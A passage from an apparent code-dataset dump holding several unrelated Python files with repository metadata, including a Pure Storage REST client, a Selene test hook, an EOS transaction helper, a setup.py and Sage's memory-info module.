def delete_snmp_manager(self, manager):
return self._request("DELETE", "snmp/{0}".format(manager))
def get_snmp_engine_id(self):
return self._request("GET", "snmp", {"engine_id": True})
def get_snmp_manager(self, manager):
return self._request("GET", "snmp/{0}".format(manager))
def list_snmp_managers(self):
return self._request("GET", "snmp")
def rename_snmp_manager(self, manager, name):
return self.set_snmp_manager(manager, name=name)
def set_snmp_manager(self, manager, **kwargs):
return self._request("PUT", "snmp/{0}".format(manager), kwargs)
def test_snmp_manager(self, manager):
return self.set_snmp_manager(manager, action="test")
def connect_array(self, address, connection_key, connection_type, **kwargs):
data = {"address": address,
"connection_key": connection_key,
"type": connection_type}
data.update(kwargs)
return self._request("POST", "array/connection", data)
def disconnect_array(self, address):
return self._request("DELETE",
"array/connection/{0}".format(address))
def list_array_connections(self, **kwargs):
return self._request("GET", "array/connection", kwargs)
def throttle_array_connection(self, address, **kwargs):
return self._request("PUT", "array/connection/{0}".format(address), kwargs)
def create_pgroup(self, pgroup, **kwargs):
return self._request("POST", "pgroup/{0}".format(pgroup), kwargs)
def create_pgroup_snapshot(self, source, **kwargs):
result = self.create_pgroup_snapshots([source], **kwargs)
if self._rest_version >= LooseVersion("1.4"):
headers = result.headers
result = ResponseDict(result[0])
result.headers = headers
return result
def create_pgroup_snapshots(self, sources, **kwargs):
data = {"source": sources, "snap": True}
data.update(kwargs)
return self._request("POST", "pgroup", data)
def destroy_pgroup(self, pgroup):
return self._request("DELETE", "pgroup/{0}".format(pgroup))
def disable_pgroup_replication(self, pgroup):
return self.set_pgroup(pgroup, replicate_enabled=False)
def enable_pgroup_replication(self, pgroup):
return self.set_pgroup(pgroup, replicate_enabled=True)
def disable_pgroup_snapshots(self, pgroup):
return self.set_pgroup(pgroup, snap_enabled=False)
def enable_pgroup_snapshots(self, pgroup):
return self.set_pgroup(pgroup, snap_enabled=True)
def eradicate_pgroup(self, pgroup):
return self._request("DELETE", "pgroup/{0}".format(pgroup),
{"eradicate": True})
def get_pgroup(self, pgroup, **kwargs):
return self._request("GET", "pgroup/{0}".format(pgroup), kwargs)
def list_pgroups(self, **kwargs):
return self._request("GET", "pgroup", kwargs)
def recover_pgroup(self, pgroup):
return self.set_pgroup(pgroup, action="recover")
def rename_pgroup(self, pgroup, name):
return self.set_pgroup(pgroup, name=name)
def set_pgroup(self, pgroup, **kwargs):
return self._request("PUT", "pgroup/{0}".format(pgroup), kwargs)
def get_certificate(self, **kwargs):
return self._request("GET", "cert", kwargs)
def get_certificate_signing_request(self, **kwargs):
return self._request("GET", "cert/certificate_signing_request", kwargs)
def set_certificate(self, **kwargs):
return self._request("PUT", "cert", kwargs)
@staticmethod
def page_through(page_size, function, *args, **kwargs):
kwargs["limit"] = page_size
def get_page(token):
page_kwargs = kwargs.copy()
if token:
page_kwargs["token"] = token
return function(*args, **page_kwargs)
def page_generator():
token = None
while True:
try:
response = get_page(token)
token = response.headers.get("x-next-token")
except PureError as err:
yield None, err
else:
if response:
sent_token = yield response, None
if sent_token is not None:
token = sent_token
else:
return
return page_generator()
def get_app(self, app):
return self._request("GET", "app/{0}".format(app))
def list_apps(self, **kwargs):
return self._request("GET", "app", kwargs)
class ResponseList(list):
def __init__(self, l=()):
super(ResponseList, self).__init__(l)
self.headers = {}
class ResponseDict(dict):
def __init__(self, d=()):
super(ResponseDict, self).__init__(d)
self.headers = {}
class PureError(Exception):
def __init__(self, reason):
self.reason = reason
super(PureError, self).__init__()
def __str__(self):
return "PureError: {0}".format(self.reason)
class PureHTTPError(PureError):
def __init__(self, target, rest_version, response):
super(PureHTTPError, self).__init__(response.reason)
self.target = target
self.rest_version = rest_version
self.code = response.status_code
self.headers = response.headers
self.text = response.text
def __str__(self):
msg = ("PureHTTPError status code {0} returned by REST "
"version {1} at {2}: {3}\n{4}")
return msg.format(self.code, self.rest_version, self.target,
self.reason, self.text)
| true | true |
f7325d5471f3864ebbc211b12867d82ff5de718c | 1,304 | py | Python | web_test/assist/selene/shared/hook.py | yashaka/selene-pytest-template | 12ed37ac5970f415c61cae50d03c62a7d31975fa | [
"MIT"
] | null | null | null | web_test/assist/selene/shared/hook.py | yashaka/selene-pytest-template | 12ed37ac5970f415c61cae50d03c62a7d31975fa | [
"MIT"
] | null | null | null | web_test/assist/selene/shared/hook.py | yashaka/selene-pytest-template | 12ed37ac5970f415c61cae50d03c62a7d31975fa | [
"MIT"
] | null | null | null | import allure
from selene.core.exceptions import TimeoutException
from selene.support.shared import browser
def attach_snapshots_on_failure(error: TimeoutException) -> Exception:
"""
An example of selene hook_wait_failure that attaches snapshots to failed test step.
It is actually might not needed,
because using pytest_runtest_makereport hook
you can achieve similar
by attaching screenshots to the test body itself,
that is more handy during analysis of test report
but if you need it, you can use it by adding to your browser setup fixture::
import web_test
browser.config.hook_wait_failure = \
web_test.assist.selene.shared.hook.attach_snapshots_on_failure
otherwise, you can skip it;)
"""
last_screenshot = browser.config.last_screenshot
if last_screenshot:
allure.attach.file(source=last_screenshot,
name='screenshot on failure',
attachment_type=allure.attachment_type.PNG)
last_page_source = browser.config.last_page_source
if last_page_source:
allure.attach.file(source=last_page_source,
name='page source on failure',
attachment_type=allure.attachment_type.HTML)
return error
| 37.257143 | 87 | 0.696319 | import allure
from selene.core.exceptions import TimeoutException
from selene.support.shared import browser
def attach_snapshots_on_failure(error: TimeoutException) -> Exception:
last_screenshot = browser.config.last_screenshot
if last_screenshot:
allure.attach.file(source=last_screenshot,
name='screenshot on failure',
attachment_type=allure.attachment_type.PNG)
last_page_source = browser.config.last_page_source
if last_page_source:
allure.attach.file(source=last_page_source,
name='page source on failure',
attachment_type=allure.attachment_type.HTML)
return error
| true | true |
f7325e38e6b3e37a43fb029d0d2a6c0bc984703c | 1,956 | py | Python | experiments/Scripts for creating plots/sac_performance_over_generations.py | arlo-lib/ARLO | 159669884044686e36e07bd1cc0948884ed7cc8d | [
"MIT"
] | null | null | null | experiments/Scripts for creating plots/sac_performance_over_generations.py | arlo-lib/ARLO | 159669884044686e36e07bd1cc0948884ed7cc8d | [
"MIT"
] | null | null | null | experiments/Scripts for creating plots/sac_performance_over_generations.py | arlo-lib/ARLO | 159669884044686e36e07bd1cc0948884ed7cc8d | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
x=np.arange(50)
y=np.array([-59.00138158129509,
-43.966695525591895,
-52.5277642686108,
-32.1793153104166,
-37.81484603001339,
-24.97787027415733,
-20.170115700140766,
-19.194577812051865,
-24.267556747544734,
-18.56846706310683,
-24.168507205879642,
-21.613453728913854,
-19.833679338413056,
-16.78310378266553,
-15.692655896866523,
-15.496178593312704,
-15.23787215267857,
-14.754095951096263,
-12.79724037524585,
-11.496812508420765,
-11.593305322673082,
-12.144980726639616,
-11.889169042516812,
-10.983010599192548,
-10.751331950717917,
-10.887445777009278,
-10.94197566653676,
-10.983575687515879,
-10.315668585661115,
-10.200188159394665,
-10.2623815297516,
-9.98878690162022,
-9.664489111145294,
-9.798550374351311,
-9.66769644336881,
-9.114549499466483,
-9.259332831572362,
-9.175694376996443,
-9.415038345909062,
-9.50191440403006,
-9.36517394141991,
-9.244892043097575,
-9.220243263930586,
-9.160062939634974,
-9.293750423507198,
-9.189954421974406,
-9.125946744761388,
-9.182482014624696,
-9.135265034880312,
-9.35027383852138])
plt.plot()
plt.plot(x,y) | 33.152542 | 37 | 0.463701 | import numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
x=np.arange(50)
y=np.array([-59.00138158129509,
-43.966695525591895,
-52.5277642686108,
-32.1793153104166,
-37.81484603001339,
-24.97787027415733,
-20.170115700140766,
-19.194577812051865,
-24.267556747544734,
-18.56846706310683,
-24.168507205879642,
-21.613453728913854,
-19.833679338413056,
-16.78310378266553,
-15.692655896866523,
-15.496178593312704,
-15.23787215267857,
-14.754095951096263,
-12.79724037524585,
-11.496812508420765,
-11.593305322673082,
-12.144980726639616,
-11.889169042516812,
-10.983010599192548,
-10.751331950717917,
-10.887445777009278,
-10.94197566653676,
-10.983575687515879,
-10.315668585661115,
-10.200188159394665,
-10.2623815297516,
-9.98878690162022,
-9.664489111145294,
-9.798550374351311,
-9.66769644336881,
-9.114549499466483,
-9.259332831572362,
-9.175694376996443,
-9.415038345909062,
-9.50191440403006,
-9.36517394141991,
-9.244892043097575,
-9.220243263930586,
-9.160062939634974,
-9.293750423507198,
-9.189954421974406,
-9.125946744761388,
-9.182482014624696,
-9.135265034880312,
-9.35027383852138])
plt.plot()
plt.plot(x,y) | true | true |
f7325e94e83568ba3af3aaa3e3f4c4a03332c471 | 1,351 | py | Python | contract.py | wxz52155/OpenFarmerOnAnchor | c089f0955cc4041818a64e01e3f13e5337ddd396 | [
"Apache-2.0"
] | null | null | null | contract.py | wxz52155/OpenFarmerOnAnchor | c089f0955cc4041818a64e01e3f13e5337ddd396 | [
"Apache-2.0"
] | null | null | null | contract.py | wxz52155/OpenFarmerOnAnchor | c089f0955cc4041818a64e01e3f13e5337ddd396 | [
"Apache-2.0"
] | 1 | 2022-01-21T04:09:52.000Z | 2022-01-21T04:09:52.000Z | import datetime as dt
from requests import HTTPError
import eospy.cleos
import eospy.keys
import pytz
from settings import user_param
def push_transaction(params_json):
# this url is to a testnet that may or may not be working.
# We suggest using a different testnet such as kylin or jungle
#
ce = eospy.cleos.Cleos(url=user_param.rpc_domain)
arguments = params_json['actions'][0]['data']
payload = {
"account": params_json['actions'][0]['account'],
"name": params_json['actions'][0]['name'],
"authorization": params_json['actions'][0]['authorization'],
}
# Converting payload to binary
data = ce.abi_json_to_bin(payload['account'], payload['name'], arguments)
# Inserting payload binary form as "data" field in original payload
payload['data'] = data['binargs']
# final transaction formed
trx = {"actions": [payload]}
trx['expiration'] = str(
(dt.datetime.utcnow() + dt.timedelta(seconds=60)).replace(tzinfo=pytz.UTC))
# use a string or EOSKey for push_transaction
# key = "5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3"
# use EOSKey:
key = eospy.keys.EOSKey(user_param.private_key)
try:
resp = ce.push_transaction(trx, key, broadcast=True)
return True, resp
except HTTPError as e:
return False, str(e)
| 33.775 | 83 | 0.679497 | import datetime as dt
from requests import HTTPError
import eospy.cleos
import eospy.keys
import pytz
from settings import user_param
def push_transaction(params_json):
ce = eospy.cleos.Cleos(url=user_param.rpc_domain)
arguments = params_json['actions'][0]['data']
payload = {
"account": params_json['actions'][0]['account'],
"name": params_json['actions'][0]['name'],
"authorization": params_json['actions'][0]['authorization'],
}
data = ce.abi_json_to_bin(payload['account'], payload['name'], arguments)
payload['data'] = data['binargs']
trx = {"actions": [payload]}
trx['expiration'] = str(
(dt.datetime.utcnow() + dt.timedelta(seconds=60)).replace(tzinfo=pytz.UTC))
key = eospy.keys.EOSKey(user_param.private_key)
try:
resp = ce.push_transaction(trx, key, broadcast=True)
return True, resp
except HTTPError as e:
return False, str(e)
| true | true |
f7325f7757fea1fb00807643e7b1200d995cc928 | 2,142 | py | Python | setup.py | harrymvr/absorbing-centrality | d143e5bfe042dc863da28851448f2b811ed45c68 | [
"0BSD"
] | 19 | 2015-09-03T12:38:40.000Z | 2021-01-06T09:38:27.000Z | setup.py | harrymvr/absorbing-centrality | d143e5bfe042dc863da28851448f2b811ed45c68 | [
"0BSD"
] | 2 | 2015-09-01T15:08:14.000Z | 2015-11-16T13:38:36.000Z | setup.py | harrymvr/absorbing-centrality | d143e5bfe042dc863da28851448f2b811ed45c68 | [
"0BSD"
] | 5 | 2015-10-09T22:03:59.000Z | 2018-05-25T08:32:32.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import absolute_import, print_function
import io
import os
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import relpath
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
return io.open(
join(dirname(__file__), *names),
encoding=kwargs.get('encoding', 'utf8')
).read()
tests_require=['nose']
setup(
name='absorbing_centrality',
version='0.1.0',
license='ISC',
description='An implementation of the absorbing random-walk centrality measure for graphs.',
long_description='%s\n%s' % (read('README.rst'), re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst'))),
author='Charalampos Mavroforakis',
author_email='cmav@bu.edu',
url='https://github.com/harrymvr/absorbing-centrality',
packages=['absorbing_centrality'],
# package_dir={'': 'absorbing_centrality'},
# py_modules=[splitext(basename(path))[0] for path in glob('absorbing_centrality/*.py')],
include_package_data=True,
zip_safe=False,
test_suite='nose.collector',
classifiers=[
# complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'License :: OSI Approved :: ISC License (ISCL)',
'Topic :: Scientific/Engineering :: Information Analysis',
'Natural Language :: English'
],
keywords=['graph mining', 'node centrality', 'random walks', 'algorithms',
'data mining'
],
install_requires=[
'networkx>=1.9.1',
'numpy==1.9.2',
'scipy==0.16'
],
extras_require={
'tests': tests_require,
},
)
| 31.970149 | 116 | 0.641457 |
from __future__ import absolute_import, print_function
import io
import os
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import relpath
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
return io.open(
join(dirname(__file__), *names),
encoding=kwargs.get('encoding', 'utf8')
).read()
tests_require=['nose']
setup(
name='absorbing_centrality',
version='0.1.0',
license='ISC',
description='An implementation of the absorbing random-walk centrality measure for graphs.',
long_description='%s\n%s' % (read('README.rst'), re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst'))),
author='Charalampos Mavroforakis',
author_email='cmav@bu.edu',
url='https://github.com/harrymvr/absorbing-centrality',
packages=['absorbing_centrality'],
include_package_data=True,
zip_safe=False,
test_suite='nose.collector',
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'License :: OSI Approved :: ISC License (ISCL)',
'Topic :: Scientific/Engineering :: Information Analysis',
'Natural Language :: English'
],
keywords=['graph mining', 'node centrality', 'random walks', 'algorithms',
'data mining'
],
install_requires=[
'networkx>=1.9.1',
'numpy==1.9.2',
'scipy==0.16'
],
extras_require={
'tests': tests_require,
},
)
| true | true |
f7325fa0e342ce06f43789c08ccef69fbef643ab | 14,935 | py | Python | src/sage/misc/memory_info.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 3 | 2019-07-15T13:48:24.000Z | 2019-11-08T12:31:43.000Z | src/sage/misc/memory_info.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 2 | 2018-10-30T13:40:20.000Z | 2020-07-23T12:13:30.000Z | src/sage/misc/memory_info.py | bopopescu/sage | 2d495be78e0bdc7a0a635454290b27bb4f5f70f0 | [
"BSL-1.0"
] | 7 | 2021-11-08T10:01:59.000Z | 2022-03-03T11:25:52.000Z | """
Information about available RAM/swap
There is no portable way to figure these out, nor should you generally
have to. But GAP currently needs to allocate a cache of fixed size
upon startup, and we would like a certain fraction of the swap address
space.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo, MemoryInfo_proc
doctest:...
DeprecationWarning: the module sage.misc.memory_info is deprecated, use the psutil package instead.
See http://trac.sagemath.org/21805 for details.
sage: mem = MemoryInfo()
sage: mem.total_ram() # random output
16708194304
sage: mem.available_ram() # random output
1690738688
sage: mem.total_swap() # random output
15728635904
sage: mem.available_swap() # random output
15340593152
"""
#*****************************************************************************
# Copyright (C) 2012 Volker Braun <vbraun.name@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.superseded import deprecation
deprecation(21805, "the module sage.misc.memory_info is deprecated, use the psutil package instead.")
import subprocess
from sys import maxsize
from sage.structure.sage_object import SageObject
memory_info_instance = None
def MemoryInfo():
"""
Provide information about memory
OUTPUT:
A class that is encapsulates memory information. If no method for
the particular host OS is provided, reasonable guesses are given.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo, MemoryInfo_proc
sage: mem = MemoryInfo()
sage: mem.total_ram() # random output
16708194304
sage: mem.available_ram() # random output
1690738688
sage: mem.total_swap() # random output
15728635904
sage: mem.available_swap() # random output
15340593152
"""
global memory_info_instance
if memory_info_instance is not None:
return memory_info_instance
import platform
system = platform.system()
if memory_info_instance is None and \
system != 'Darwin':
try:
memory_info_instance = MemoryInfo_proc()
except OSError:
pass
if memory_info_instance is None and \
system == 'Darwin':
try:
memory_info_instance = MemoryInfo_OSX()
except OSError:
pass
if memory_info_instance is None:
memory_info_instance = MemoryInfo_guess()
return memory_info_instance
class MemoryInfo_base(SageObject):
"""
Base class for memory info objects.
"""
def rlimit_address_space(self):
"""
Return ``RLIMIT_AS``.
OUTPUT:
Integer. The limit in bytes or `-1` if no limit is set or cannot
be found out.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: mem = MemoryInfo()
sage: mem.rlimit_address_space() in ZZ
True
"""
import resource
try:
limit = resource.getrlimit(resource.RLIMIT_AS)[0]
except resource.error:
return -1
if limit == resource.RLIM_INFINITY:
return -1
return limit
def virtual_memory_limit(self):
"""
Return the upper limit for virtual memory usage
This is the value set by ``ulimit -v`` at the command line
(bounded by ``sys.maxsize``) or a practical limit if no limit
is set.
OUTPUT:
Integer. The virtual memory limit in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: mem = MemoryInfo()
sage: mem.virtual_memory_limit() > 0
True
sage: mem.virtual_memory_limit() <= sys.maxsize
True
"""
limit = self.rlimit_address_space()
if limit < 0:
limit = self.total_swap() + self.total_ram()
# Use less than half of the addressable memory
return min(maxsize, limit)
class MemoryInfo_proc(MemoryInfo_base):
"""
Provide information from ``/proc/`` pseudo-filesystem on most UNIXes
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: mem = MemoryInfo()
sage: mem.total_ram() # random output
16708194304
"""
def __init__(self):
try:
self._parse_proc_meminfo()
except (IOError, ValueError):
raise OSError('/proc/meminfo is not available')
def _parse_proc_meminfo(self):
"""
Parse ``/proc/meminfo``
OUTPUT:
A dictionary. All sizes are in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo, MemoryInfo_proc
sage: mem = MemoryInfo()
sage: if isinstance(mem, MemoryInfo_proc):
....: info = mem._parse_proc_meminfo()
....: else:
....: info = None
sage: info # random output
{'available_ram': 1749782528,
'total_swap': 15728635904,
'free_swap': 15340572672,
'total_ram': 16708194304}
sage: keys = set(['available_ram', 'total_swap', 'free_swap', 'total_ram'])
sage: (info is None) or keys.issubset(info.keys())
True
"""
kb = 1024
result = dict()
meminfo = open('/proc/meminfo', 'r')
for line in meminfo.readlines():
line = line.split()
if line[0].startswith('MemTotal') and line[2] == 'kB':
result['total_ram'] = int(line[1]) * kb
if line[0].startswith('MemFree') and line[2] == 'kB':
result['available_ram'] = int(line[1]) * kb
if line[0].startswith('SwapTotal') and line[2] == 'kB':
result['total_swap'] = int(line[1]) * kb
if line[0].startswith('SwapFree') and line[2] == 'kB':
result['free_swap'] = int(line[1]) * kb
if line[0].startswith('Committed_AS') and line[2] == 'kB':
result['Committed_AS'] = int(line[1]) * kb
meminfo.close()
required = set(['available_ram', 'total_swap', 'free_swap', 'total_ram'])
if not required.issubset(result.keys()):
raise OSError('failed to parse /proc/meminfo correctly')
return result
def total_ram(self):
"""
Return the total RAM size
OUTPUT:
Integer. The RAM size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().total_ram() > 0
True
"""
return self._parse_proc_meminfo()['total_ram']
def available_ram(self):
"""
Return the available (free) RAM size
OUTPUT:
Integer. The free RAM size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().available_ram() > 0
True
"""
return self._parse_proc_meminfo()['available_ram']
def total_swap(self):
"""
Return the total swap size
OUTPUT:
Integer. The swap size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().total_swap() >= 0
True
"""
return self._parse_proc_meminfo()['total_swap']
def available_swap(self):
"""
Return the available (free) swap size
OUTPUT:
Integer. The free swap size in bytes, excluding reserved swap
space. Can be negative if the system is overcommitting memory.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().available_swap() in ZZ
True
"""
info = self._parse_proc_meminfo()
try:
return info['total_swap'] - info['Committed_AS']
except KeyError:
return info['free_swap']
class MemoryInfo_OSX(MemoryInfo_base):
"""
Memory info on OSX
TESTS::
sage: from sage.misc.memory_info import MemoryInfo_OSX
"""
def __init__(self):
self._maxage = 10 # cache result for 10 seconds
self._age = -self._maxage
try:
self._parse_top()
except (IOError, ValueError, subprocess.CalledProcessError, KeyError):
raise OSError('failed to parse OSX "top" output')
def _parse_top_output(self, meminfo):
"""
Pick total and available memory out of the "top" output
INPUT:
- ``meminfo`` -- output of "top"
OUTPUT:
See :meth:`_parse_top`.
TESTS::
sage: from sage.misc.memory_info import MemoryInfo_OSX
sage: m = MemoryInfo_OSX.__new__(MemoryInfo_OSX)
sage: osx_ppc = 'PhysMem: 64.7M wired, 87.3M active, 14.1M inactive, 29.3M used, 21.8M free'
sage: m._parse_top_output(osx_ppc)
{'available_ram': 22858956, 'total_ram': 53582232}
sage: osx_x86 = 'PhysMem: 8861M wired, 3574M active, 678M inactive, 13G used, 19G free.'
sage: m._parse_top_output(osx_x86)
{'available_ram': 20401094656L, 'total_ram': 34359738368L} # 32-bit
{'available_ram': 20401094656, 'total_ram': 34359738368} # 64-bit
"""
units = { 'K': 1024, 'M':1024**2, 'G':1024**3 }
for line in meminfo.splitlines():
if not line.startswith('PhysMem:'):
continue
line = line.split()
if not line[-1].startswith('free') or not line[-3].startswith('used'):
raise OSError('failed to parse PhysMem: line in "top" output')
used_ram = line[-4]
free_ram = line[-2]
used_ram = int( float(used_ram[:-1]) * units[used_ram[-1]])
free_ram = int( float(free_ram[:-1]) * units[free_ram[-1]])
return { 'total_ram': used_ram + free_ram,
'available_ram': free_ram }
raise OSError('failed to parse "top" output, no PhysMem: section')
def _parse_top(self):
"""
Parse ``top`` output
OUTPUT:
A dictionary. All sizes are in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo, MemoryInfo_OSX
sage: mem = MemoryInfo()
sage: if isinstance(mem, MemoryInfo_OSX):
....: info = mem._parse_top()
....: else:
....: info = None
sage: info # random output
{'available_ram': 1749782528,
'total_ram': 16708194304}
sage: keys = set(['available_ram', 'total_ram'])
sage: (info is None) or (set(info.keys()) == keys)
True
"""
import time
if (time.time()-self._age) < self._maxage:
return self._parse_top_cache
meminfo = subprocess.check_output(['top', '-l', '1'],
stderr=subprocess.STDOUT)
result = self._parse_top_output(meminfo)
self._age = time.time()
self._parse_top_cache = result
return result
def total_ram(self):
"""
Return the total RAM size
OUTPUT:
Integer. The RAM size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().total_ram() > 0
True
"""
return self._parse_top()['total_ram']
def available_ram(self):
"""
Return the available (free) RAM size
OUTPUT:
Integer. The free RAM size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().available_ram() > 0
True
"""
return self._parse_top()['available_ram']
def total_swap(self):
"""
Return the total swap size
The OSX swap file is growing dynamically, so we just return
twice the total ram.
OUTPUT:
Integer. The swap size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().total_swap() >= 0
True
"""
return 2*self.total_ram()
def available_swap(self):
"""
Return the available (free) swap size
The OSX swap file is growing dynamically, so we just return
twice the available ram.
OUTPUT:
Integer. The free swap size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().available_swap() in ZZ
True
"""
return 2*self.available_ram()
class MemoryInfo_guess(MemoryInfo_base):
"""
Guess memory as a fallback.
TESTS::
sage: from sage.misc.memory_info import MemoryInfo_guess
sage: mem = MemoryInfo_guess()
sage: mem.total_ram()
4294967296 # 64-bit
4294967296L # 32-bit
"""
def total_ram(self):
"""
Return the total RAM size
OUTPUT:
Integer. The RAM size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().total_ram() > 0
True
"""
GB = 1024 * 1024 * 1024
return 4*GB
def available_ram(self):
"""
Return the available (free) RAM size
OUTPUT:
Integer. The free RAM size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().available_ram() > 0
True
"""
return self.total_ram()
def total_swap(self):
"""
Return the total swap size
OUTPUT:
Integer. The swap size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().total_swap() >= 0
True
"""
GB = 1024 * 1024 * 1024
return 4*GB
def available_swap(self):
"""
Return the available (free) swap size
OUTPUT:
Integer. The free swap size in bytes.
EXAMPLES::
sage: from sage.misc.memory_info import MemoryInfo
sage: MemoryInfo().available_swap() in ZZ
True
"""
return self.total_swap()
| 28.666027 | 108 | 0.566856 |
from sage.misc.superseded import deprecation
deprecation(21805, "the module sage.misc.memory_info is deprecated, use the psutil package instead.")
import subprocess
from sys import maxsize
from sage.structure.sage_object import SageObject
memory_info_instance = None
def MemoryInfo():
global memory_info_instance
if memory_info_instance is not None:
return memory_info_instance
import platform
system = platform.system()
if memory_info_instance is None and \
system != 'Darwin':
try:
memory_info_instance = MemoryInfo_proc()
except OSError:
pass
if memory_info_instance is None and \
system == 'Darwin':
try:
memory_info_instance = MemoryInfo_OSX()
except OSError:
pass
if memory_info_instance is None:
memory_info_instance = MemoryInfo_guess()
return memory_info_instance
class MemoryInfo_base(SageObject):
def rlimit_address_space(self):
import resource
try:
limit = resource.getrlimit(resource.RLIMIT_AS)[0]
except resource.error:
return -1
if limit == resource.RLIM_INFINITY:
return -1
return limit
def virtual_memory_limit(self):
limit = self.rlimit_address_space()
if limit < 0:
limit = self.total_swap() + self.total_ram()
return min(maxsize, limit)
class MemoryInfo_proc(MemoryInfo_base):
def __init__(self):
try:
self._parse_proc_meminfo()
except (IOError, ValueError):
raise OSError('/proc/meminfo is not available')
def _parse_proc_meminfo(self):
kb = 1024
result = dict()
meminfo = open('/proc/meminfo', 'r')
for line in meminfo.readlines():
line = line.split()
if line[0].startswith('MemTotal') and line[2] == 'kB':
result['total_ram'] = int(line[1]) * kb
if line[0].startswith('MemFree') and line[2] == 'kB':
result['available_ram'] = int(line[1]) * kb
if line[0].startswith('SwapTotal') and line[2] == 'kB':
result['total_swap'] = int(line[1]) * kb
if line[0].startswith('SwapFree') and line[2] == 'kB':
result['free_swap'] = int(line[1]) * kb
if line[0].startswith('Committed_AS') and line[2] == 'kB':
result['Committed_AS'] = int(line[1]) * kb
meminfo.close()
required = set(['available_ram', 'total_swap', 'free_swap', 'total_ram'])
if not required.issubset(result.keys()):
raise OSError('failed to parse /proc/meminfo correctly')
return result
def total_ram(self):
return self._parse_proc_meminfo()['total_ram']
def available_ram(self):
return self._parse_proc_meminfo()['available_ram']
def total_swap(self):
return self._parse_proc_meminfo()['total_swap']
def available_swap(self):
info = self._parse_proc_meminfo()
try:
return info['total_swap'] - info['Committed_AS']
except KeyError:
return info['free_swap']
class MemoryInfo_OSX(MemoryInfo_base):
def __init__(self):
self._maxage = 10
self._age = -self._maxage
try:
self._parse_top()
except (IOError, ValueError, subprocess.CalledProcessError, KeyError):
raise OSError('failed to parse OSX "top" output')
def _parse_top_output(self, meminfo):
units = { 'K': 1024, 'M':1024**2, 'G':1024**3 }
for line in meminfo.splitlines():
if not line.startswith('PhysMem:'):
continue
line = line.split()
if not line[-1].startswith('free') or not line[-3].startswith('used'):
raise OSError('failed to parse PhysMem: line in "top" output')
used_ram = line[-4]
free_ram = line[-2]
used_ram = int( float(used_ram[:-1]) * units[used_ram[-1]])
free_ram = int( float(free_ram[:-1]) * units[free_ram[-1]])
return { 'total_ram': used_ram + free_ram,
'available_ram': free_ram }
raise OSError('failed to parse "top" output, no PhysMem: section')
def _parse_top(self):
import time
if (time.time()-self._age) < self._maxage:
return self._parse_top_cache
meminfo = subprocess.check_output(['top', '-l', '1'],
stderr=subprocess.STDOUT)
result = self._parse_top_output(meminfo)
self._age = time.time()
self._parse_top_cache = result
return result
def total_ram(self):
return self._parse_top()['total_ram']
def available_ram(self):
return self._parse_top()['available_ram']
def total_swap(self):
return 2*self.total_ram()
def available_swap(self):
return 2*self.available_ram()
class MemoryInfo_guess(MemoryInfo_base):
def total_ram(self):
GB = 1024 * 1024 * 1024
return 4*GB
def available_ram(self):
return self.total_ram()
def total_swap(self):
GB = 1024 * 1024 * 1024
return 4*GB
def available_swap(self):
return self.total_swap()
| true | true |
f73260433b527d8ba6321087e688077524d361a8 | 3,993 | py | Python | tests/integ/test_ntm.py | satishpasumarthi/sagemaker-python-sdk | 255a339ae985041ef47e3a80da91b9f54bca17b9 | [
"Apache-2.0"
] | 1 | 2021-12-10T16:18:29.000Z | 2021-12-10T16:18:29.000Z | tests/integ/test_ntm.py | satishpasumarthi/sagemaker-python-sdk | 255a339ae985041ef47e3a80da91b9f54bca17b9 | [
"Apache-2.0"
